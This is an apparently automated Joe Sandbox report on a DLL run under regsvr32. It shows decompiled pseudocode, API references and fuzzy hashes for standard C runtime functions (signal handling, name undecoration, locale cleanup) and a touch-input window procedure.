Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name$Name::$Name::append$Name::doName::operator=Pchar$Decorator::getNode::makeStatus
String ID: {for
API String ID: 2672197563-864106941
Opcode ID: f991458babf38872d77373f666b8e03bd92a669f9389b465606812813759d9f0
Instruction ID: 95fdc0c1d251034285bb73f2bb88751a56e09ee5e13d11d9af9d9099a4f62ed2
Opcode Fuzzy Hash: f991458babf38872d77373f666b8e03bd92a669f9389b465606812813759d9f0
Instruction Fuzzy Hash: 3D51B2A2F09A8698F7039B65CE623FC23A0BB56744F449131DF4D126B6DFBCA581D380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0725F4 Relevance: 21.2, APIs: 14, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00007FFD7FFD2B0725F4(void* __ecx, long long __rax, long long __rbx, void* __rcx, long long __rdx, long long __rdi, long long __rsi, void* __rbp, long long _a8, long long _a16, long long _a24) {
				void* _v24;
				int _t21;
				void* _t37;
				void* _t62;
				long long _t74;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t97;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				long long _t119;
				signed long long _t126;
				long long _t127;

				_t74 = __rax;
				_t26 = __ecx;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t119 = __rdx;
				_t37 = __ecx;
				r12d = 0;
				if (__rdx == 4) goto 0x2b07286e;
				if (__rdx == 3) goto 0x2b07286e;
				if (__ecx == 2) goto 0x2b072743;
				if (__ecx == 0x15) goto 0x2b072743;
				if (__ecx == 0x16) goto 0x2b072743;
				if (__ecx == 6) goto 0x2b072743;
				if (__ecx == 0xf) goto 0x2b072743;
				if (__ecx == 8) goto 0x2b072665;
				if (__ecx == 4) goto 0x2b072665;
				if (__ecx != 0xb) goto 0x2b07286e;
				E00007FFD7FFD2B067ED8(__rax, __rbx, __rcx, __rdx, __rdx, __rbp);
				_t127 = _t74;
				if (_t74 == 0) goto 0x2b07286e;
				if ( *((intOrPtr*)(_t74 + 0xa0)) != 0x2b083330) goto 0x2b0726b5;
				E00007FFD7FFD2B0678EC(_t26,  *((intOrPtr*)(_t74 + 0xa0)) - 0x2b083330, 0x2b083330,  *0x2b0833f8, __rdi, _t119);
				 *((long long*)(_t127 + 0xa0)) = _t74;
				if (_t74 == 0) goto 0x2b07286e;
				E00007FFD7FFD2B064B80(_t26, _t74, _t74, 0x2b083330,  *0x2b0833f8);
				_t97 =  *((intOrPtr*)(_t127 + 0xa0));
				_t112 = _t97;
				_t126 =  *0x2b0833fc;
				if ( *((intOrPtr*)(_t112 + 4)) == _t37) goto 0x2b0726df;
				_t113 = _t112 + 0x10;
				if (_t113 - (_t126 << 4) + _t97 < 0) goto 0x2b0726c7;
				if (_t113 - (_t126 << 4) + _t97 >= 0) goto 0x2b0726f3;
				if ( *((intOrPtr*)(_t113 + 4)) == _t37) goto 0x2b0726f5;
				if (_t113 == 0) goto 0x2b07286e;
				if (_t119 == 2) goto 0x2b072869;
				_t114 = _t113 + 4;
				goto 0x2b07273a;
				 *((long long*)(_t114 + 4)) = _t119;
				_t12 = _t114 + 0x10 - 4; // -24
				_t81 = _t12;
				if (_t81 - ( *0x2b0833fc << 4) +  *((intOrPtr*)(_t127 + 0xa0)) >= 0) goto 0x2b072869;
				if ( *((intOrPtr*)(_t114 + 0x10)) == _t37) goto 0x2b072712;
				goto 0x2b072869;
				E00007FFD7FFD2B0696D8();
				if (_t37 == 2) goto 0x2b072755;
				if (_t37 != 0x15) goto 0x2b072793;
				if ( *0x2b0c9b38 != 0) goto 0x2b072793;
				_t21 = SetConsoleCtrlHandler(??, ??);
				_t62 = _t21 - 1;
				if (_t62 != 0) goto 0x2b07277d;
				 *0x2b0c9b38 = _t21;
				goto 0x2b072793;
				E00007FFD7FFD2B0676B8(_t81);
				 *_t81 = GetLastError();
				r12d = 1;
				if (_t62 == 0) goto 0x2b072837;
				if (_t62 == 0) goto 0x2b07280f;
				if (_t62 == 0) goto 0x2b0727e7;
				if (_t62 == 0) goto 0x2b0727bb;
				if (_t62 == 0) goto 0x2b07280f;
				goto 0x2b07285d;
				__imp__DecodePointer();
				if (_t119 == 2) goto 0x2b07285d;
				__imp__EncodePointer();
				 *0x2b0c9b20 = _t81;
				goto 0x2b07285d;
				__imp__DecodePointer();
				if (_t119 == 2) goto 0x2b07285d;
				__imp__EncodePointer();
				 *0x2b0c9b30 = _t81;
				goto 0x2b07285d;
				__imp__DecodePointer();
				if (_t119 == 2) goto 0x2b07285d;
				__imp__EncodePointer();
				 *0x2b0c9b28 = _t81;
				goto 0x2b07285d;
				__imp__DecodePointer();
				if (_t119 == 2) goto 0x2b07285d;
				__imp__EncodePointer();
				 *0x2b0c9b18 = _t81;
				E00007FFD7FFD2B0695B8();
				if (r12d != 0) goto 0x2b07286e;
				_t82 = _t81;
				goto 0x2b07289b;
				if (_t37 == 1) goto 0x2b072897;
				if (_t37 == 3) goto 0x2b072897;
				if (_t37 == 0xd) goto 0x2b072897;
				if (_t37 - 0xf <= 0) goto 0x2b072887;
				if (_t37 - 0x11 <= 0) goto 0x2b072897;
				E00007FFD7FFD2B067698(_t82);
				 *_t82 = 0x16;
				return E00007FFD7FFD2B069444();
			}

0x7ffd2b0725f4
0x7ffd2b0725f4
0x7ffd2b0725f4
0x7ffd2b0725f9
0x7ffd2b0725fe
0x7ffd2b072609
0x7ffd2b07260c
0x7ffd2b07260e
0x7ffd2b072615
0x7ffd2b07261f
0x7ffd2b072628
0x7ffd2b072631
0x7ffd2b07263a
0x7ffd2b072643
0x7ffd2b07264c
0x7ffd2b072655
0x7ffd2b07265a
0x7ffd2b07265f
0x7ffd2b072665
0x7ffd2b07266a
0x7ffd2b072670
0x7ffd2b072684
0x7ffd2b07268d
0x7ffd2b072692
0x7ffd2b07269d
0x7ffd2b0726b0
0x7ffd2b0726b5
0x7ffd2b0726bd
0x7ffd2b0726c0
0x7ffd2b0726ca
0x7ffd2b0726cc
0x7ffd2b0726dd
0x7ffd2b0726ec
0x7ffd2b0726f1
0x7ffd2b0726f8
0x7ffd2b072706
0x7ffd2b07270c
0x7ffd2b072710
0x7ffd2b072712
0x7ffd2b07272d
0x7ffd2b07272d
0x7ffd2b072734
0x7ffd2b07273c
0x7ffd2b07273e
0x7ffd2b072745
0x7ffd2b07274e
0x7ffd2b072753
0x7ffd2b07275c
0x7ffd2b07276a
0x7ffd2b072770
0x7ffd2b072773
0x7ffd2b072775
0x7ffd2b07277b
0x7ffd2b07277d
0x7ffd2b07278b
0x7ffd2b07278d
0x7ffd2b072798
0x7ffd2b0727a1
0x7ffd2b0727a6
0x7ffd2b0727ab
0x7ffd2b0727af
0x7ffd2b0727b6
0x7ffd2b0727c2
0x7ffd2b0727cf
0x7ffd2b0727d8
0x7ffd2b0727de
0x7ffd2b0727e5
0x7ffd2b0727ee
0x7ffd2b0727fb
0x7ffd2b072800
0x7ffd2b072806
0x7ffd2b07280d
0x7ffd2b072816
0x7ffd2b072823
0x7ffd2b072828
0x7ffd2b07282e
0x7ffd2b072835
0x7ffd2b07283e
0x7ffd2b07284b
0x7ffd2b072850
0x7ffd2b072856
0x7ffd2b07285f
0x7ffd2b072867
0x7ffd2b072869
0x7ffd2b07286c
0x7ffd2b072871
0x7ffd2b072876
0x7ffd2b07287b
0x7ffd2b072880
0x7ffd2b072885
0x7ffd2b072887
0x7ffd2b07288c
0x7ffd2b0728b0

APIs

_lock.LIBCMT ref: 00007FFD2B072745
SetConsoleCtrlHandler.KERNEL32 ref: 00007FFD2B07276A
__doserrno.LIBCMT ref: 00007FFD2B07277D
GetLastError.KERNEL32 ref: 00007FFD2B072785
DecodePointer.KERNEL32 ref: 00007FFD2B0727C2
EncodePointer.KERNEL32 ref: 00007FFD2B0727D8
DecodePointer.KERNEL32 ref: 00007FFD2B0727EE
EncodePointer.KERNEL32 ref: 00007FFD2B072800
DecodePointer.KERNEL32 ref: 00007FFD2B072816
EncodePointer.KERNEL32 ref: 00007FFD2B072828
DecodePointer.KERNEL32 ref: 00007FFD2B07283E
EncodePointer.KERNEL32 ref: 00007FFD2B072850
_errno.LIBCMT ref: 00007FFD2B072887
_invalid_parameter_noinfo.LIBCMT ref: 00007FFD2B072892

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast__doserrno_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 171417116-0
Opcode ID: 174255f378b25e3063231d76e2d84cfa87c90814d6123d5e052098e8f4fc6e0a
Instruction ID: c402dc803eb8dc143332ca80ab048d81b33a100e11a64f1d576acfacaed561ec
Opcode Fuzzy Hash: 174255f378b25e3063231d76e2d84cfa87c90814d6123d5e052098e8f4fc6e0a
Instruction Fuzzy Hash: 20719261F0BA0281FAA79B059F7517CA291EF8FB80F144035C69E062B5DEADF941F2C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B063A5C Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetTouchInputInfo.USER32 ref: 00007FFD2B063AEE
CloseTouchInputHandle.USER32 ref: 00007FFD2B063B87
InvalidateRect.USER32 ref: 00007FFD2B063BA2
DefWindowProcW.USER32 ref: 00007FFD2B063BC3
DestroyWindow.USER32 ref: 00007FFD2B063BCE
BeginPaint.USER32 ref: 00007FFD2B063BDE
EndPaint.USER32 ref: 00007FFD2B063BF4
UnregisterTouchWindow.USER32 ref: 00007FFD2B063C53
MessageBoxW.USER32 ref: 00007FFD2B063C70
PostQuitMessage.USER32 ref: 00007FFD2B063CB6

Strings

Cannot unregister application window for touch input, xrefs: 00007FFD2B063C64
Error, xrefs: 00007FFD2B063C5D

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: TouchWindow$InputMessagePaint$BeginCloseDestroyHandleInfoInvalidatePostProcQuitRectUnregister
String ID: Cannot unregister application window for touch input$Error
API String ID: 1507798779-2666531736
Opcode ID: 0f58f9c20f5c697e616207143ae176cb8818f701bca30e05ecbeb031851873e6
Instruction ID: 3803001c13dace45aa383ed97eece436e2da83374d20137031ae37be7f6aa3b3
Opcode Fuzzy Hash: 0f58f9c20f5c697e616207143ae176cb8818f701bca30e05ecbeb031851873e6
Instruction Fuzzy Hash: 19619D21F0AA468AE6179B25DE2533863A4AF46B90F048235DA1E576F0DFBCF454E3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06C55C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 144
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 60%

			E00007FFD7FFD2B06C55C(long long __rbx, signed long long* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
				void* _t46;
				void* _t52;
				void* _t64;
				char _t65;
				void* _t85;
				signed long long _t86;
				char* _t88;
				char* _t89;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr* _t92;
				intOrPtr _t93;
				signed long long* _t97;
				signed long long* _t100;
				intOrPtr _t101;
				intOrPtr* _t114;
				intOrPtr _t134;
				void* _t138;
				void* _t139;
				void* _t141;
				signed long long _t142;
				void* _t148;

				_t144 = __r8;
				_t136 = __rsi;
				_t85 = _t141;
				 *((long long*)(_t85 + 0x10)) = __rbx;
				 *((long long*)(_t85 + 0x18)) = __rsi;
				 *((long long*)(_t85 + 0x20)) = __rdi;
				_t139 = _t85 - 0x5f;
				_t142 = _t141 - 0x100;
				_t86 =  *0x2b0c70a0; // 0xf787487f4682
				 *(_t139 + 0x47) = _t86 ^ _t142;
				 *__rcx =  *__rcx & 0x00000000;
				__rcx[1] = 0;
				__rcx[1] = __rcx[1] & 0xffff00ff;
				_t97 = __rcx;
				 *0x2b0c9a99 = sil;
				if (__rcx[1] != 0) goto 0x2b06c79e;
				_t88 =  *0x2b0c9a70; // 0x0
				if ( *_t88 == 0) goto 0x2b06c79e;
				if ( *_t88 == 0x40) goto 0x2b06c79e;
				if (1 == 0) goto 0x2b06c5ce;
				goto 0x2b06c5df;
				_t100 = __rcx;
				_t46 = E00007FFD7FFD2B06AF5C(0x2c, 0, _t88, __rcx, __rcx, __rsi, __r8, _t138);
				_t89 =  *0x2b0c9a70; // 0x0
				_t65 =  *_t89;
				r8d = _t100 - 0x30;
				if (r8d - 9 > 0) goto 0x2b06c60e;
				_t101 =  *0x2b0c9a68; // 0x0
				_t90 = _t89 + 1;
				 *0x2b0c9a70 = _t90;
				E00007FFD7FFD2B06A6DC(_t46, _t101, _t139 - 0x19);
				goto 0x2b06c78c;
				 *(_t142 + 0x20) =  *(_t142 + 0x20) & 0x00000000;
				 *(_t142 + 0x28) =  *(_t142 + 0x28) & 0xffff0000;
				_t134 = _t90;
				if (_t65 != 0x58) goto 0x2b06c644;
				_t91 = _t90 + 1;
				 *0x2b0c9a70 = _t91;
				E00007FFD7FFD2B06AD7C(_t142 + 0x20, "void");
				goto 0x2b06c761;
				if (_t65 != 0x24) goto 0x2b06c665;
				_t92 = _t91 + 1;
				if ( *_t92 == _t65) goto 0x2b06c665;
				 *0x2b0c9a70 = _t92;
				E00007FFD7FFD2B06C0D4(0x2c, _t97, _t139 + 7, "void", _t134, __rsi, __r8, __r10, __r11);
				goto 0x2b06c758;
				if (_t65 != 0x3f) goto 0x2b06c73f;
				E00007FFD7FFD2B06C058(_t92, _t97, _t139 - 0x79, "void", _t136, __r10, __r11);
				if (( *0x2b0c9a8c & 0x00004000) == 0) goto 0x2b06c6f5;
				r8d = 0x10;
				_t52 = E00007FFD7FFD2B0750DC(E00007FFD7FFD2B06A4DC(_t97, _t139 - 0x79, _t139 + 0x37, _t136), _t139 + 0x37);
				 *0x2b0c9a90();
				if (_t92 == 0) goto 0x2b06c6b1;
				goto 0x2b06c635;
				E00007FFD7FFD2B06A9E0(_t139 - 9, "`template-parameter");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x29], xmm0");
				E00007FFD7FFD2B06AC78(_t92, _t139 - 0x29, _t139 - 0x79);
				asm("movaps xmm5, [ebp-0x29]");
				asm("movdqa [ebp-0x39], xmm5");
				E00007FFD7FFD2B06AFE0(_t52, 0, _t92, _t97, _t139 - 0x39, "\'", _t136, _t144);
				asm("movaps xmm5, [ebp-0x39]");
				goto 0x2b06c737;
				E00007FFD7FFD2B06A9E0(_t139 + 0x27, "`template-parameter");
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x49], xmm0");
				E00007FFD7FFD2B06AC78(_t92, _t139 - 0x49, _t139 - 0x79);
				asm("movaps xmm5, [ebp-0x49]");
				asm("movdqa [ebp-0x59], xmm5");
				E00007FFD7FFD2B06AFE0(_t52, 0, _t92, _t97, _t139 - 0x59, "\'", _t136, _t144);
				asm("movaps xmm5, [ebp-0x59]");
				asm("movdqa [esp+0x20], xmm5");
				goto 0x2b06c761;
				 *(_t139 - 0x69) =  *(_t139 - 0x69) & 0x00000000;
				 *(_t139 - 0x61) =  *(_t139 - 0x61) & 0xffff0000;
				E00007FFD7FFD2B07006C(_t64, _t52, 0x2c, 0, _t92, _t97, _t139 + 0x17, _t139 - 0x69, _t134, _t136, _t144, __r10, __r11, _t148);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x20], xmm0");
				_t93 =  *0x2b0c9a70; // 0x0
				if (_t93 - _t134 - 1 <= 0) goto 0x2b06c787;
				_t114 =  *0x2b0c9a68; // 0x0
				if ( *_t114 == 9) goto 0x2b06c787;
				E00007FFD7FFD2B06A67C(_t93 - _t134, _t97, _t114, _t142 + 0x20, _t144);
				E00007FFD7FFD2B06AC78(_t93 - _t134, _t97, _t142 + 0x20);
				if ( *((char*)(_t97 + 8)) == 0) goto 0x2b06c5ad;
				 *0x2b0c9a99 = 0;
				return E00007FFD7FFD2B064980(_t52,  *(_t139 + 0x47) ^ _t142, _t142 + 0x20, _t144);
			}

0x7ffd2b06c55c
0x7ffd2b06c55c
0x7ffd2b06c55c
0x7ffd2b06c55f
0x7ffd2b06c563
0x7ffd2b06c567
0x7ffd2b06c56c
0x7ffd2b06c570
0x7ffd2b06c577
0x7ffd2b06c581
0x7ffd2b06c585
0x7ffd2b06c589
0x7ffd2b06c58d
0x7ffd2b06c599
0x7ffd2b06c59c
0x7ffd2b06c5a7
0x7ffd2b06c5ad
0x7ffd2b06c5b7
0x7ffd2b06c5c0
0x7ffd2b06c5c8
0x7ffd2b06c5cc
0x7ffd2b06c5d0
0x7ffd2b06c5d3
0x7ffd2b06c5d8
0x7ffd2b06c5df
0x7ffd2b06c5e2
0x7ffd2b06c5ea
0x7ffd2b06c5ec
0x7ffd2b06c5f3
0x7ffd2b06c5fa
0x7ffd2b06c601
0x7ffd2b06c609
0x7ffd2b06c60e
0x7ffd2b06c614
0x7ffd2b06c61c
0x7ffd2b06c622
0x7ffd2b06c624
0x7ffd2b06c62e
0x7ffd2b06c63a
0x7ffd2b06c63f
0x7ffd2b06c647
0x7ffd2b06c649
0x7ffd2b06c64e
0x7ffd2b06c654
0x7ffd2b06c65b
0x7ffd2b06c660
0x7ffd2b06c668
0x7ffd2b06c672
0x7ffd2b06c681
0x7ffd2b06c68b
0x7ffd2b06c69a
0x7ffd2b06c6a1
0x7ffd2b06c6aa
0x7ffd2b06c6af
0x7ffd2b06c6bc
0x7ffd2b06c6c9
0x7ffd2b06c6cc
0x7ffd2b06c6d1
0x7ffd2b06c6d6
0x7ffd2b06c6e5
0x7ffd2b06c6ea
0x7ffd2b06c6ef
0x7ffd2b06c6f3
0x7ffd2b06c700
0x7ffd2b06c70d
0x7ffd2b06c710
0x7ffd2b06c715
0x7ffd2b06c71a
0x7ffd2b06c729
0x7ffd2b06c72e
0x7ffd2b06c733
0x7ffd2b06c737
0x7ffd2b06c73d
0x7ffd2b06c73f
0x7ffd2b06c744
0x7ffd2b06c753
0x7ffd2b06c758
0x7ffd2b06c75b
0x7ffd2b06c761
0x7ffd2b06c76f
0x7ffd2b06c771
0x7ffd2b06c77b
0x7ffd2b06c782
0x7ffd2b06c78f
0x7ffd2b06c798
0x7ffd2b06c79e
0x7ffd2b06c7cc

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06C5D3
DName::operator=.LIBCMT ref: 00007FFD2B06C63A

Part of subcall function 00007FFD2B06AD7C: DName::doPchar.LIBCMT ref: 00007FFD2B06ADAB

DName::operator+=.LIBCMT ref: 00007FFD2B06C78F

Strings

`template-parameter, xrefs: 00007FFD2B06C6B1, 00007FFD2B06C6F5
void, xrefs: 00007FFD2B06C627

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$Name::doName::operator=Pchar
String ID: `template-parameter$void
API String ID: 592721650-4057429177
Opcode ID: cb6d2622e47490461d3dcceb8289e39a323902ee6cf53929493a7c4b90427398
Instruction ID: e06d292a7f291e47b86a8b7a13d8d40d3f011c5071c76e509d23f87051b9211c
Opcode Fuzzy Hash: cb6d2622e47490461d3dcceb8289e39a323902ee6cf53929493a7c4b90427398
Instruction Fuzzy Hash: B071C322F0AA468DF7229B24DE623FC3361BB56748F448135EA4D066B5DFACE545E3C0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0710C4 Relevance: 19.6, APIs: 13, Instructions: 90
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E00007FFD7FFD2B0710C4(long long __rbx, long long* __rcx, long long __rdx, void* __rdi, long long __rsi, long long _a8, long long _a16) {
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				long long* _t68;
				intOrPtr _t69;
				long long _t70;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t90;
				long long* _t91;
				intOrPtr* _t96;
				void* _t98;
				intOrPtr _t101;
				void* _t107;
				intOrPtr* _t108;

				_t94 = __rdx;
				_a8 = __rbx;
				_a16 = __rsi;
				_t60 =  *((intOrPtr*)(__rcx + 0x128));
				_t68 = __rcx;
				if (_t60 == 0) goto 0x2b07115b;
				if (_t60 == 0x2b0c8490) goto 0x2b07115b;
				_t61 =  *((intOrPtr*)(__rcx + 0x110));
				if (_t61 == 0) goto 0x2b07115b;
				if ( *_t61 != 0) goto 0x2b07115b;
				_t74 =  *((intOrPtr*)(__rcx + 0x120));
				if (_t74 == 0) goto 0x2b071121;
				if ( *_t74 != 0) goto 0x2b071121;
				free(__rdi);
				_t26 = E00007FFD7FFD2B076A4C(_t25,  *((intOrPtr*)(__rcx + 0x128)));
				_t76 =  *((intOrPtr*)(__rcx + 0x118));
				if (_t76 == 0) goto 0x2b071143;
				if ( *_t76 != 0) goto 0x2b071143;
				free(??);
				_t27 = E00007FFD7FFD2B07673C(_t26,  *((intOrPtr*)(__rcx + 0x128)));
				free(??);
				free(??);
				_t62 =  *((intOrPtr*)(__rcx + 0x130));
				if (_t62 == 0) goto 0x2b0711ae;
				if ( *_t62 != 0) goto 0x2b0711ae;
				free(??);
				free(??);
				free(??);
				free(??);
				_t87 =  *((intOrPtr*)(__rcx + 0x158));
				if (_t87 == 0x2b0c7e00) goto 0x2b0711db;
				if ( *((intOrPtr*)(_t87 + 0x160)) != 0) goto 0x2b0711db;
				_t28 = E00007FFD7FFD2B076274(_t27, _t87);
				free(??);
				_t96 = _t68 + 0x58;
				if ( *((intOrPtr*)(_t96 - 0x10)) == 0x2b0c7df4) goto 0x2b071203;
				_t89 =  *_t96;
				if (_t89 == 0) goto 0x2b071203;
				if ( *_t89 != 0) goto 0x2b071203;
				free(??);
				if ( *((long long*)(_t96 - 8)) == 0) goto 0x2b07121d;
				_t90 =  *((intOrPtr*)(_t96 + 8));
				if (_t90 == 0) goto 0x2b07121d;
				_t52 =  *_t90;
				if (_t52 != 0) goto 0x2b07121d;
				free(??);
				if (_t52 != 0) goto 0x2b0711e4;
				_t91 = _t68;
				_t69 = _a8;
				_t101 = _a16;
				_pop(_t98);
				goto E00007FFD7FFD2B06640C;
				asm("int3");
				asm("int3");
				asm("int3");
				_t70 = __rdx;
				if (__rdx == 0) goto 0x2b07128f;
				if (_t91 == 0) goto 0x2b07128f;
				_t108 =  *_t91;
				if (_t108 == __rdx) goto 0x2b07128a;
				 *_t91 = __rdx;
				_t29 = E00007FFD7FFD2B070F94(_t28, __rdx, _t107);
				if (_t108 == 0) goto 0x2b07128a;
				E00007FFD7FFD2B071020(_t29, _t108, _t107);
				if ( *_t108 != 0) goto 0x2b07128a;
				if (_t108 == 0x2b0c80c0) goto 0x2b07128a;
				E00007FFD7FFD2B0710C4(_t70, _t108, _t94, _t98, _t101, _t69);
				goto 0x2b071291;
				return 0;
			}

0x7ffd2b0710c4
0x7ffd2b0710c4
0x7ffd2b0710c9
0x7ffd2b0710d3
0x7ffd2b0710da
0x7ffd2b0710e0
0x7ffd2b0710ec
0x7ffd2b0710ee
0x7ffd2b0710f8
0x7ffd2b0710fd
0x7ffd2b0710ff
0x7ffd2b071109
0x7ffd2b07110e
0x7ffd2b071110
0x7ffd2b07111c
0x7ffd2b071121
0x7ffd2b07112b
0x7ffd2b071130
0x7ffd2b071132
0x7ffd2b07113e
0x7ffd2b07114a
0x7ffd2b071156
0x7ffd2b07115b
0x7ffd2b071165
0x7ffd2b07116a
0x7ffd2b07117a
0x7ffd2b07118e
0x7ffd2b07119d
0x7ffd2b0711a9
0x7ffd2b0711ae
0x7ffd2b0711bf
0x7ffd2b0711c8
0x7ffd2b0711ca
0x7ffd2b0711d6
0x7ffd2b0711db
0x7ffd2b0711ef
0x7ffd2b0711f1
0x7ffd2b0711f7
0x7ffd2b0711fc
0x7ffd2b0711fe
0x7ffd2b071208
0x7ffd2b07120a
0x7ffd2b071211
0x7ffd2b071213
0x7ffd2b071216
0x7ffd2b071218
0x7ffd2b071224
0x7ffd2b071226
0x7ffd2b071229
0x7ffd2b07122e
0x7ffd2b071237
0x7ffd2b071238
0x7ffd2b07123d
0x7ffd2b07123e
0x7ffd2b07123f
0x7ffd2b071246
0x7ffd2b07124c
0x7ffd2b071251
0x7ffd2b071253
0x7ffd2b071259
0x7ffd2b07125b
0x7ffd2b071261
0x7ffd2b071269
0x7ffd2b07126e
0x7ffd2b071277
0x7ffd2b071283
0x7ffd2b071285
0x7ffd2b07128d
0x7ffd2b071296

APIs

__free_lconv_mon.LIBCMT ref: 00007FFD2B07111C

Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076A6A
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076A7C
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076A8E
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AA0
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AB2
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AC4
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AD6
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AE8
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076AFA
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076B0C
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076B21
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076B36
Part of subcall function 00007FFD2B076A4C: free.LIBCMT ref: 00007FFD2B076B4B

free.LIBCMT ref: 00007FFD2B071110

Part of subcall function 00007FFD2B06640C: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD2B067F44,?,?,?,00007FFD2B0676A1,?,?,?,?,00007FFD2B065382), ref: 00007FFD2B066422
